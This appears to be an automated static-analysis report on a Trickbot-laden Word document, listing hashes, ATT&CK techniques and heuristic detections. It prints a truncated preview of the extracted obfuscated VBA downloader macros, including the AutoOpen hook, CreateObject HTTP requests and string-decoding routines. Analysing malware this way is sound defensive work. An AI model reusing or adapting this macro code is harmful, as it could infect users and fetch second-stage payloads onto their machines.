Trickbot — Office (OLE) malware analysis

Static analysis result for SHA-256 60a202fcc402e1d1…

MALICIOUS

Office (OLE)

Size: 132.5 KB · Created: 2018-04-20 07:33:00 · Authoring application: Microsoft Office Word · First seen: 2019-01-11
MD5: 2b6b2a2d992a82fb9b6d5d9e0e5295f7
SHA-1: b39812c867a3ee9997734371fee4dc39d120be83
SHA-256: 60a202fcc402e1d1ba786b8810d631a18af0207b96fa5ad46f021601a221f845
Risk Score: 262

Malware Insights

Trickbot · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with a signature indicating Trickbot. The presence of VBA macros, specifically an AutoOpen macro and CreateObject calls, strongly suggests malicious intent. The script attempts to download a second-stage payload by making HTTP requests to URLs constructed from obfuscated strings, which is a common Trickbot behavior.

Heuristics (8)

  • ClamAV: Doc.Downloader.Trickbot-6444938-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Trickbot-6444938-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call [high] OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10920 bytes
SHA-256: 0f12976257708a2ed19d0fa6ad0bfd3076c48bcfa1302b20faa5a975ec0022f0

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
t2201953
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
End Sub

Attribute VB_Name = "aliciamp3"
Function polojester()
polojester = "9E58|E697E5''Rhl5|Eunu"
End Function
    
Function llehangn()
llehangn = veotsirH.nekukufu
End Function

Function racing1965()
Set naryejec = CreateObject(UserForm1.TextBox3)
naryejec.Open UserForm1.TextBox2, abctrident(dylan2001), False
naryejec.send
If naryejec.Status <> 200 Then
naryejec.Open UserForm1.TextBox2, abctrident(goblue01), False
naryejec.send
Else
End If
daxdizpa naryejec
September1667
End Function


Attribute VB_Name = "AVODOROBELH"
Attribute VB_Base = "0{0A3FCBC7-A2A5-474F-A060-56F30A6DA1D4}{0111BA67-243D-4682-85BE-FF9E394FEFD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub

Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub

Private Sub jupiter500_Change()
Set torontolee = CreateObject(deedflut)
esreeves = 97 * 10
esreeves = 74 * 9
esreeves = 81 + 10
esreeves = 67 + 13
esreeves = 40 + 18 + 7
esreeves = 59 - 100 - 8
wade1673 torontolee
End Sub

Private Sub Label1_Click()
MsgBox "Ok"
End Sub

Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub

Attribute VB_Name = "AVOHITLOB"
Attribute VB_Base = "0{6A9586A8-94BA-4473-ADB7-5E30387A65BA}{2557F000-7316-4D63-A3AA-25A41BB94DB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "broiddor"
Function heagrace()
heagrace = AVODOROBELH.Search11
End Function

Sub t2201953()
Randomize
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
veotsirH.zebrastart = "tetteris"
End Sub

Attribute VB_Name = "elsieroger"
Function abctrident(vokrabuhC)
wreckkha = ""
jokerhack = Len(vokrabuhC)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
For billfool = 1 To jokerhack
wreckkha = wreckkha + punkin198(sleekrel(vokrabuhC, billfool), 4)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
Next billfool
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
abctrident = wreckkha
End Function

Function deedflut()
deedflut = sunlibrary
End Function

Function sunlibrary()
sunlibrary = abctrident(ukayobkas.shoorbaa)
End Function


Attribute VB_Name = "evathrac"
Function open0318(ncccrapp, hootiebasf)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
open0318 = abctrident(AVODOROBELH.stalshaf) + ncccrapp + abctrident(AVOHITLOB.abcd2345) + _
 hootiebasf + abctrident(AVODOROBELH.musicjoe + AVODOROBELH.blackberry) + hootiebasf
End Function

Attribute VB_Name = "fionachip"
Function christyaaa(pantyman)
redvirus = 3 - 139
redvirus = redvirus - redvirus * 37 * 12
redvirus = redvirus * redvirus - 1 * 12
redvirus = 60 - 8 + 66 * 6
redvirus = 61 * 12
redvirus = 113 - 105 - redvirus * 13
ch
... (truncated)